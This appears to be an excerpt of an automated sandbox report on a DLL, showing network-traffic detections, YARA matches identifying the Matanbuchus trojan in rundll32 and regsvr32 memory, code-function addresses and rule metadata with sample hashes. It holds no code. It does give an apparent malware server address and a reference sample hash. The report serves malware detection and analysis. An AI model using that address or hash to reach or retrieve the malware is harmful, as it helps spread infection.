                    Source: unknownNetwork traffic detected: HTTP traffic on port 64471 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64429 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64460 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64441 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64311 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64466 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64350 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64418 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60864 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64435 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64401
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64423 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64382
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60854 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60919 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64340 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64417 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64455 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64390
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64390 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60905
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64461 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64440 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64450 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60919
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64467 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64279
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64434 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60911
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64290
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64445 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64428 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64439 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64456 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64473 -> 443
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64426 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000000B.00000002.2258285565.000000000544F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000001B.00000002.2807563546.0000000004ED7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000005.00000002.3398661420.000000007FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000003.00000002.2210553685.00000000051AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 0000001B.00000002.2808336693.000000007F7F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000005.00000002.3397711298.000000000507E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
                    Source: 00000009.00000002.2233332273.000000000508B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF59E983_2_7EF59E98
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF17A603_2_7EF17A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF61B6C3_2_7EF61B6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF59B503_2_7EF59B50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF418903_2_7EF41890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF373203_2_7EF37320
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF495103_2_7EF49510
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF692AF3_2_7EF692AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF373203_2_7EF37320
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF290203_2_7EF29020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF531503_2_7EF53150
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF551003_2_7EF55100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF3CE303_2_7EF3CE30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF66A0C3_2_7EF66A0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF4EB403_2_7EF4EB40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2A9803_2_7EF2A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF306D03_2_7EF306D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5A58B3_2_7EF5A58B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2E5603_2_7EF2E560
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF2C2E03_2_7EF2C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5E27D3_2_7EF5E27D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF5A2263_2_7EF5A226
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB18905_2_7FAB1890
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA73205_2_7FAA7320
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAACE305_2_7FAACE30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC9E985_2_7FAC9E98
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD1B6C5_2_7FAD1B6C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC9B505_2_7FAC9B50
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA87A605_2_7FA87A60
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA73205_2_7FAA7320
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB95105_2_7FAB9510
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD92AF5_2_7FAD92AF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC51005_2_7FAC5100
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAC31505_2_7FAC3150
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA990205_2_7FA99020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FABEB405_2_7FABEB40
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD6A0C5_2_7FAD6A0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9A9805_2_7FA9A980
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAA06D05_2_7FAA06D0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9E5A65_2_7FA9E5A6
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FACA58B5_2_7FACA58B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FA9C2E05_2_7FA9C2E0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FACA2265_2_7FACA226
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FACE27D5_2_7FACE27D
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F06CE309_2_7F06CE30
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F089E989_2_7F089E98
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F07EB409_2_7F07EB40
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F089B509_2_7F089B50
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F091B6C9_2_7F091B6C
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F096A0C9_2_7F096A0C
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F047A609_2_7F047A60
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05A9809_2_7F05A980
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0718909_2_7F071890
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0606D09_2_7F0606D0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0795109_2_7F079510
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05E5609_2_7F05E560
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F08A58B9_2_7F08A58B
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0673209_2_7F067320
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F08A2269_2_7F08A226
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F08E27D9_2_7F08E27D
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0992AF9_2_7F0992AF
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F05C2E09_2_7F05C2E0
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0851009_2_7F085100
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0831509_2_7F083150
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F0590209_2_7F059020
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7FABE000 appears 46 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EF4E000 appears 45 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EF5BFCD appears 167 times
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7FACBFCD appears 167 times
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F08BFCD appears 152 times
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F07E000 appears 41 times
                    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624
                    Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 11.2.rundll32.exe.7fc30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 5.2.rundll32.exe.7fa60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 9.2.regsvr32.exe.7f020000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 3.2.rundll32.exe.7eef0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 11.2.rundll32.exe.7fc30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 3.2.rundll32.exe.7eef0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 27.2.regsvr32.exe.7f7f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 9.2.regsvr32.exe.7f020000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
                    Source: 27.2.regsvr32.exe.7f7f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
                    Source: 5.2.rundll32.exe.7fa60000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
